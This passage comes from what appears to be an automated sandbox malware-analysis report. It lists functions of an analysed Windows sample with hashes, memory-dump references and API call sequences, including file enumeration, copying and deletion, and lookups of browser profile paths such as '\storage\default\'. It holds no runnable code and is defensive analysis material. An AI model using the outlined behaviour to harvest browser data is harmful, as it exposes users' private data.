                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 149c6505cea1e12aa68f6f07e88fdf2d2d832ce92d85607f238be6c780c8d0cf
                          • Instruction ID: c319e2172daba249b83238bdd0e8803acf3bb5debfc5da8536b16a92c8516dca
                          • Opcode Fuzzy Hash: 149c6505cea1e12aa68f6f07e88fdf2d2d832ce92d85607f238be6c780c8d0cf
                          • Instruction Fuzzy Hash: 2F5138B3A182005FF3046E29DC9937AB7D6EF94320F2A493DE6C5C3384E97D58468756
                          Function 008A85F6 Relevance: .2, Instructions: 184COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f34f14b7a93dd17380044be89bb2332eda1dc19dbcb1037231b9a3e202054b72
                          • Instruction ID: 9ea059e41c7061390f5a20e93433f8e8e3e002ad5921f76db9b22f819623c803
                          • Opcode Fuzzy Hash: f34f14b7a93dd17380044be89bb2332eda1dc19dbcb1037231b9a3e202054b72
                          • Instruction Fuzzy Hash: DD5129B3B092245BE3089978DC857B773DADBC4360F1A863DEE85D7748E8755C0682E2
                          Function 00813721 Relevance: .2, Instructions: 172COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ec005bcadb1e5fc41a01b8a80ac3f300af486a27afba74889d05002a24620cab
                          • Instruction ID: 4361ae91fd480483ff627688e40e1971825addac575db6f7bb5cc86cd6ea5615
                          • Opcode Fuzzy Hash: ec005bcadb1e5fc41a01b8a80ac3f300af486a27afba74889d05002a24620cab
                          • Instruction Fuzzy Hash: D84199F3E052201BE318593DED6577BB79ADBC4670F2B823DDE8593788E8295C0542D1
                          Function 0097B624 Relevance: .2, Instructions: 156COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: e11eafe85294c24a7c5226ef9d31a1e008e95be0acf5ac2767e52c14c89c4505
                          • Instruction ID: 78a3580d90650acd33553a05dd6c5a5c2238473108032ab2a728f672ba56242e
                          • Opcode Fuzzy Hash: e11eafe85294c24a7c5226ef9d31a1e008e95be0acf5ac2767e52c14c89c4505
                          • Instruction Fuzzy Hash: 3A51BDB350C704DFD304AE29D88573AF7E4EB98710F228D2DDACA87600E37958519B87
                          Function 008897EC Relevance: .1, Instructions: 138COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 4f3f0ef69e1773064707e7e78baa675f5624c825b1f7f589417f77cbd8793472
                          • Instruction ID: ebc18949fd1e9835b5b603494754dad041db47111a8a1e19567dd49c76e6100d
                          • Opcode Fuzzy Hash: 4f3f0ef69e1773064707e7e78baa675f5624c825b1f7f589417f77cbd8793472
                          • Instruction Fuzzy Hash: 804127F3A0C304AFE3596E28DC8177BB7D9EB54320F160A3DEAD9D3740E93958008686
                          Function 0079AD85 Relevance: .1, Instructions: 128COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 1b14fa1ebbfc6da2c8390cef140fb170c1be33e3238c7b0af08be91576fcbe27
                          • Instruction ID: 2bee0f41eecca5944394c91ebc0cfb619123cc51f66b2a41f394bf68076b5e5e
                          • Opcode Fuzzy Hash: 1b14fa1ebbfc6da2c8390cef140fb170c1be33e3238c7b0af08be91576fcbe27
                          • Instruction Fuzzy Hash: F9313AF36186104FE748AE3DDC8A336BBD6EBD4310F14C62DE6C5C638CE93448058685
                          Function 009BE410 Relevance: .1, Instructions: 71COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: 51f90a903a9067e9b48ae15e59222d193bf38ea7a3745bf08aa4a1bc0aea2406
                          • Instruction ID: 2ade8e565e4651694703581c8eafd006351b117a1c7e8d2d4f41e4b3a1abc922
                          • Opcode Fuzzy Hash: 51f90a903a9067e9b48ae15e59222d193bf38ea7a3745bf08aa4a1bc0aea2406
                          • Instruction Fuzzy Hash: 631104B290C214ABD70C6D289E3667B77DDDB08320F16092FB987D7380EC655C5093C6
                          Function 005285B0 Relevance: 69.4, APIs: 45, Strings: 1, Instructions: 449stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrlen.KERNEL32(00000000), ref: 00528636
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052866D
                          • lstrcpy.KERNEL32(?,00000000), ref: 005286AA
                          • StrStrA.SHLWAPI(?,011ADA20), ref: 005286CF
                          • lstrcpyn.KERNEL32(007493D0,?,00000000), ref: 005286EE
                          • lstrlen.KERNEL32(?), ref: 00528701
                          • wsprintfA.USER32 ref: 00528711
                          • lstrcpy.KERNEL32(?,?), ref: 00528727
                          • StrStrA.SHLWAPI(?,011ADE58), ref: 00528754
                          • lstrcpy.KERNEL32(?,007493D0), ref: 005287B4
                          • StrStrA.SHLWAPI(?,011ADCD8), ref: 005287E1
                          • lstrcpyn.KERNEL32(007493D0,?,00000000), ref: 00528800
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcpynlstrlen$wsprintf
                          • String ID: %s%s
                          • API String ID: 2672039231-3252725368
                          • Opcode ID: 7555589b2749b4ace4eefef0cea55de7ba990aecc90064e37be462e126b2f260
                          • Instruction ID: ea72d987f461fe19157ba0f6a4cdbb67084896c77619edb3396e2da3c2535285
                          • Opcode Fuzzy Hash: 7555589b2749b4ace4eefef0cea55de7ba990aecc90064e37be462e126b2f260
                          • Instruction Fuzzy Hash: 9AF18C75901119AFDB10DFA4ED48AEF7BB9FF89300F008655EA09A7250DB34AE44CFA5
                          Function 00511F79 Relevance: 54.4, APIs: 36, Instructions: 407stringfileCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00511F9F
                          • lstrlen.KERNEL32(011A8A20), ref: 00511FAE
                          • lstrcpy.KERNEL32(00000000,?), ref: 00511FDB
                          • lstrcat.KERNEL32(00000000,?), ref: 00511FE3
                          • lstrlen.KERNEL32(00541794), ref: 00511FEE
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051200E
                          • lstrcat.KERNEL32(00000000,00541794), ref: 0051201A
                          • lstrcpy.KERNEL32(00000000,?), ref: 00512042
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0051204D
                          • lstrlen.KERNEL32(00541794), ref: 00512058
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00512075
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00512081
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005120AC
                          • lstrlen.KERNEL32(?), ref: 005120E4
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00512104
                          • lstrcat.KERNEL32(00000000,?), ref: 00512112
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00512139
                          • lstrlen.KERNEL32(00541794), ref: 0051214B
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051216B
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00512177
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051219D
                          • lstrcat.KERNEL32(00000000,00000000), ref: 005121A8
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005121D4
                          • lstrlen.KERNEL32(?), ref: 005121EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051220A
                          • lstrcat.KERNEL32(00000000,?), ref: 00512218
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00512242
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 0051227F
                          • lstrlen.KERNEL32(011ACF20), ref: 0051228D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005122B1
                          • lstrcat.KERNEL32(00000000,011ACF20), ref: 005122B9
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005122F7
                          • lstrcat.KERNEL32(00000000), ref: 00512304
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0051232D
                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00512356
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00512382
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005123BF
                          • DeleteFileA.KERNEL32(00000000), ref: 005123F7
                          • FindNextFileA.KERNEL32(00000000,?), ref: 00512444
                          • FindClose.KERNEL32(00000000), ref: 00512453
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$lstrcat$lstrlen$File$Find$CloseCopyDeleteNext
                          • String ID:
                          • API String ID: 2857443207-0
                          • Opcode ID: b33f8df9e323007932727e500d910fd335c045acb404d5125b3688b6d6cbd323
                          • Instruction ID: 9bc3550fba1c2657b94e8ebba14840690df58f6575a87a87b86e51ad9593de87
                          • Opcode Fuzzy Hash: b33f8df9e323007932727e500d910fd335c045acb404d5125b3688b6d6cbd323
                          • Instruction Fuzzy Hash: ABE16C35A1160A9BEB21EFB4DC89AEE7BB9BF45300F044025F905A7211DB38DDD5CBA4
                          Function 00526410 Relevance: 52.9, APIs: 29, Strings: 1, Instructions: 438stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526445
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 00526480
                          • SHGetFolderPathA.SHELL32(00000000,0000001A,00000000,00000000,?), ref: 005264AA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 005264E1
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526506
                          • lstrcat.KERNEL32(00000000,00000000), ref: 0052650E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00526537
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.2080840804.0000000000511000.00000040.00000001.01000000.00000003.sdmp, Offset: 00510000, based on PE: true
                          • Associated: 00000000.00000002.2080790064.0000000000510000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000547000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.000000000059E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005A6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.00000000005BF000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2080840804.0000000000748000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081382834.000000000075A000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.000000000075C000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000008E6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009C6000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009ED000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.00000000009F7000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2081427152.0000000000A05000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082025624.0000000000A06000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.2082260884.0000000000BA3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_510000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpy$FolderPathlstrcat
                          • String ID: \..\
                          • API String ID: 2938889746-4220915743
                          • Opcode ID: be6a4f1ee4aa88cfb6f48bc564f1ea4f861d8e329627d83726042842ff63ec61
                          • Instruction ID: c2d0546b8a51b279c8f56938a25f354f91e2adf64c8de4ad39313f1c5795d4f6
                          • Opcode Fuzzy Hash: be6a4f1ee4aa88cfb6f48bc564f1ea4f861d8e329627d83726042842ff63ec61
                          • Instruction Fuzzy Hash: 0DF18274A112269BEB21EF78E849AAE7FB5BF46300F048165F845D7291DB38DC85CF90
                          Function 00524370 Relevance: 49.3, APIs: 26, Strings: 2, Instructions: 334stringCOMMON
                          Download Yara Rule
                          APIs
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005243A3
                          • lstrcpy.KERNEL32(00000000,0053CFEC), ref: 005243D6
                          • lstrcpy.KERNEL32(00000000,?), ref: 005243FE
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00524409
                          • lstrlen.KERNEL32(\storage\default\), ref: 00524414
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524431
                          • lstrcat.KERNEL32(00000000,\storage\default\), ref: 0052443D
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524466
                          • lstrcat.KERNEL32(00000000,00000000), ref: 00524471
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524498
                          • lstrcpy.KERNEL32(00000000,?), ref: 005244D7
                          • lstrcat.KERNEL32(00000000,?), ref: 005244DF
                          • lstrlen.KERNEL32(00541794), ref: 005244EA
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 00524507
                          • lstrcat.KERNEL32(00000000,00541794), ref: 00524513
                          • lstrlen.KERNEL32(.metadata-v2), ref: 0052451E
                          • lstrcpy.KERNEL32(00000000,00000000), ref: 0052453B
